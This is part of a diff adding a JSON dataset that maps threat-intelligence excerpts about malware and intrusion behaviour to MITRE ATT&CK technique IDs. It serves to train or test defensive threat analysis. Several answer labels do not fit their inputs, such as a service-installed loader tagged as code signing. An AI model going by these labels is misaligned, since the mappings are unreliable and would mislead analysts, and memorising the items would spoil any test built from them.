technique IDs with their names.", + "input": "The shellcode loader was observed on one infected device as updater.exe with the Metasploit-style service name APTYnDS1ABEuUHEA, indicating that it was installed as a service", + "output": "- T1553.002: Subvert Trust Controls - Code Signing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "From one of the hosts, we discovered that the actor executed a credential harvesting tool named Responder and moved laterally using Windows commands. Lazarus overcame network segmentation, exfiltrating data from a completely isolated network segment cut off from the internet by compromising a router virtual machine, as we explain below under \u201cOvercoming network segmentation", + "output": "- T1557.001: Adversary-in-the-Middle - LLMNR/NBT-NS Poisoning and SMB Relay" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"1) If the malware was executed with the \"\"install\"\" command-line argument, which uses .NET Framwork\u2019s InstallHelper method to install the malware as a service. 3) If no arguments are provided and the malware determines it is running in a Windows environment, it saves a DLL to the system that it injects into the explorer.exe process. The injected DLL executable loads the malware\u2019s executable and runs it within memory of the explorer.exe process\"", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This static set of characteristics, combined with the minimal use of obfuscation in their phishing attacks, may benefit organizations that are potential targets for IRON TILDEN.ToolsTaegis\u2122 XDR Adversary Software Coverage Tool", + "output": "- T1221: Template Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Interestingly, there is an option in the RC2CL module to turn off its backdoor functionality and act as a proxy. In this case, the malware turns off the Windows firewall and creates a server that relays communication between a client and C&C server, or between two clients", + "output": "- T1090.001: Proxy - Internal Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In this attack, spear phishing was used as the initial infection vector. Before launching the attack, the group studied publicly available information about the targeted organization and identified email addresses belonging to various departments of the company", + "output": "- T1589.002: Gather Victim Identity Information - Email Addresses" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If the ransomware is not executed with administrator rights or if the infected host runs Windows Vista or later, it will attempt to elevate its privileges. In short, WastedLocker uses a well-documented UAC bypass method [1] [2]. It chooses a random file (EXE/DLL) from the Windows system32 folder and copies it to the %APPDATA% location under a different hidden filename. Next, it creates an alternate data stream (ADS) into the file named bin and copies the ransomware into it. WastedLocker then copies winsat.exe and winmm.dll into a newly created folder located in the Windows temporary folder", + "output": "- T1564.001: Hide Artifacts - Hidden Files and Directories" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After patching, the threat actor can use the Skeleton Key password configured at the time of deployment to log in as any domain user. Legitimate users can still log in using their own passwords", + "output": "- T1556.001: Modify Authentication Process - Domain Controller Authentication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In the first path, obtaining the SAML signing certificate normally entails first querying the private encryption key that resides on the AD FS container and then using that key to decrypt the signing certificate. The certificate can then be used to create illicit but valid SAML tokens that allow the actor to impersonate users, enabling them to access enterprise cloud applications and services", + "output": "- T1552.004: Unsecured Credentials - Private Keys\n- T1550: Use Alternate Authentication Material" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The websites contain numerous articles and content to make them seem legitimate; in some cases the websites have over 10,000 individual news articles. Volexity has found the content is largely scraped and reposted in full from various other legitimate online news outlets. This appears to be done in an automated fashion and most likely through WordPress plugins. Numerous posted articles and images can be directly tracked back to other online blogs and newspapers; sometimes the byline or even watermark in images show directly where the article was sourced. In some cases, only a small number of pages on the site contains malicious code; in other cases, the profiling code is pervasive", + "output": "- T1608.004: Stage Capabilities - Drive-by Target" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If the bot is running with a regular user privilege, persistence is established using the registry \u201cRun\u201d method. The loader DLL component is written to \u201c%APPDATA%\\mswinload[.]dll\u201d and a \u201cmswinload\u201d value is added to the \u201cRun\u201d key to execute ordinal #1 of the DLL with rundll32[.]exe", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Trojan does not encrypt the data sent via DNS beacons, rather it converts the ASCII characters into their hexadecimal values and includes these values in cleartext. The DNS beacons sent from the Helminth executable have the following structure, which is very similar to the script version", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Wrote indicators based on observed attacker activity \u2022 Identified lateral movement, unique backdoors, credential theft, data theft, recon, persistence creation, etc", + "output": "- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Over a few days' span, the threat actors install remote access tools on additional systems based upon the results of the network reconnaissance. They use At.exe to schedule tasks to run self-extracting RAR archives, which install either HttpBrowser or PlugX. CTU researchers observed the threat actors collecting Cisco VPN profiles to use when accessing the victim's network via VPN (see Figure 13", + "output": "- T1133: External Remote Services\n- T1053.002: Scheduled Task/Job - At" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This thread searches for for files with the following extensions on fixed drives and sends them to C2 every 60 minutes", + "output": "- T1020: Automated Exfiltration" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To deploy the file injector, the instrumentor downloads additional payloads to be injected into a benign process", + "output": "- T1055.012: Process Injection - Process Hollowing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The program copies itself as <Hangul full path>HncReporter.exe and changes the default program association in the registry to open HWP documents. To do so, it alters following registry values", + "output": "- T1546.001: Event Triggered Execution - Change Default File Association" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Another tool written in Go, GoldFinder was most likely used as a custom HTTP tracer tool that logs the route or hops that a packet takes to reach a hardcoded C2 server. When launched, the malware issues an HTTP request for a hardcoded IP address (e.g. hxxps://185[.]225[.]69[.]69/) and logs the HTTP response to a plaintext log file (e.g. loglog.txt created in the present working directory). GoldFinder uses the following hardcoded labels to store the request and response information in the log file", + "output": "- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Another interesting technique this malware uses is Visual Studio\u2019s Resource Manager. This is a feature built into Visual Studio that allows one to attach basically any file to the original binary and get a pointer to its data with a few simple API calls. Siloscape uses this method to write the Tor archive to the disk, as well as the unzip binary used to open the archive. It also uses Tor to securely connect to its C2", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The source code of SUNBURST was likely sanitized before being included in SUNSPOT. The use of generic variable names, pre-obfuscated strings, and the lack of developer comments or disabled code is similar to what could be obtained after decompiling a backdoored Orion binary, as illustrated in Figure 2, which provides a comparison between the injected source code (top) and a decompilation output (bottom", + "output": "- T1027.005: Obfuscated Files or Information - Indicator Removal from Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The first backdoor that the TeleBots group relied\u00a0heavily\u00a0on was Python/TeleBot.A, which was rewritten from Python in the Rust programming language. The functionality remains the same: it is a standard backdoor that uses the Telegram Bot API in order to receive commands from, and send responses to, the malware operator", + "output": "- T1102.002: Web Service - Bidirectional Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After the extensive validation described above, the backdoor enters its main execution stage. At its core, the backdoor is a very standard one that receives instructions from the C2 server, executes those instructions, and sends back information. The type of commands that can be executed range from manipulating of registry keys, to creating processes, and deleting files, etc. effectively providing the attackers with full access to the device, especially since it\u2019s executing from a trusted, signed binary", + "output": "- T1112: Modify Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In July 2018, Unit 42 analyzed a targeted attack using a novel file type against at least one government agency in the Middle East. It was carried out by a previously unpublished threat group we track as DarkHydrus. Based on our telemetry, we were able to uncover additional artifacts leading us to believe this adversary group has been in operation with their current playbook since early 2016. Once opened, Excel will retrieve whatever object is at the URL inside the file. These files have most recently been found in use by criminals to deliver commodity RATs such as Flawed Ammyy. In DarkHydrus's case, the preferred payload retrieved in their previous attacks were exclusively open-source legitimate tools which they abuse for malicious purposes, such as Meterpreter and Cobalt Strike. However, in this instance, it appears that this group used a custom PowerShell based payload that we call RogueRobin", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"When executed, the malware first establishes a SOCKS5 connection to 192.157.198.103 using TCP port 1913. The malware sends the SOCKS5 connection request \"\"05 01 00\"\" and verifies the server response starts with \"\"05 00\"\". The malware then requests a connection to 192.184.60.229 on TCP port 81 using the command \"\"05 01 00 01 c0 b8 3c e5 00 51\"\" and verifies that the first two bytes from the server are \"\"05 00\"\" (c0 b8 3c e5 is the IP address and 00 51 is the port in network byte order\"", + "output": "- T1104: Multi-Stage Channels" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This is likely to make it appear as if nothing is amiss to the user (as high CPU usage is a red flag of cryptocurrency-mining malware", + "output": "- T1014: Rootkit" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The VBScript in turn runs rundll32.exe, activating the Cobalt Strike DLL (step #5) using a clean parent/child process tree completely disconnected from the SolarWinds process. Finally, the VBScript removes the previously created IFEO value to clean up any traces of execution (step #6) and also deletes the following registry keys related to HTTP proxy", + "output": "- T1112: Modify Registry\n- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Malicious actors commonly maintain persistence on a victim\u2019s system by installing the malware-as-a-service. Volgmer queries the system and randomly selects a service in which to install a copy of itself. The malware then overwrites the ServiceDLL entry in the selected service's registry entry. In some cases, HIDDEN COBRA actors give the created service a pseudo-random name that may be composed of various hardcoded words", + "output": "- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The C2 server address is not embedded directly inside Tomiris: instead, it connects to a signalization server that provides the URL and port to which the backdoor should connect. Then Tomiris sends GET requests to that URL until the C2 server responds with a JSON object of the following structure", + "output": "- T1568: Dynamic Resolution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. Datper uses an RC4-encrypted configuration to obfuscate HTTP traffic. xxmm (also known as Minzen) \u2014 This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - RarStar \u2014 This custom tool uploads RAR archives to a specified URL as POST data (see Figure 6). RarStar encodes the POST data using Base64 and a custom XOR algorithm. RarStar HTTP POST request. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. When exfiltration is complete, the uploader (or Datper or xxmm) immediately uses the del command to delete the RAR archives. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "messengers. Figures 9 and 10 show FakeM attempting to resemble MSN or Yahoo. Messenger traffic, as the first 32-bytes contain data that resemble legitimate traffic generated by these chat programs", + "output": "- T1001.003: Data Obfuscation - Protocol Impersonation" + } +] \ No newline at end of file